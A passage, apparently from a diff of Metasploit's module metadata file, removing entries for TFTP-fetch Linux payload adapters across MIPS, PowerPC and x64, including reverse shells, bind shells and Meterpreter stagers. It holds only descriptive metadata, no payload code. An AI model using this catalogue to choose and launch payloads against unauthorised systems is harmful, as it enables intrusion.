+0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/mipsle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/exec", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/meterpreter", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - 
"description": "Fetch and execute an MIPSLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/reboot": { - "name": "TFTP Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/tftp/mipsle/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - 
"author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/reboot", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/mipsle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/shell", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/tftp/mipsle/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/mipsle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/mipsle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 
+0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/ppc/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:03 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/ppc/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:03 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/ppc/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:03 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/ppc64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from a TFTP 
server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:08 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64", - "adapted_refname": "linux/ppc64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64/shell_find_port": { - "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/tftp/ppc64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from a TFTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:08 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64", - "adapted_refname": "linux/ppc64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/ppc64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": 
null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:52:08 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64", - "adapted_refname": "linux/ppc64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_https": { 
- "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/ppc64le", - 
"adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/exec", - "staged": false - }, - "payload_cmd/linux/tftp/x64/meterpreter/bind_tcp": { - "name": "TFTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 
8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/tftp/x64/meterpreter/reverse_sctp": { - "name": "TFTP Fetch, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/tftp/x64/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", 
- "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/tftp/x64/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/x64/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - 
"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/x64/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/pingback_bind_tcp": { - "name": "TFTP Fetch, Linux x64 Pingback, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/x64/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nAccept a connection from 
attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/pingback_reverse_tcp": { - "name": "TFTP Fetch, Linux x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell/bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/tftp/x64/shell/reverse_sctp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/tftp/x64/shell/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the 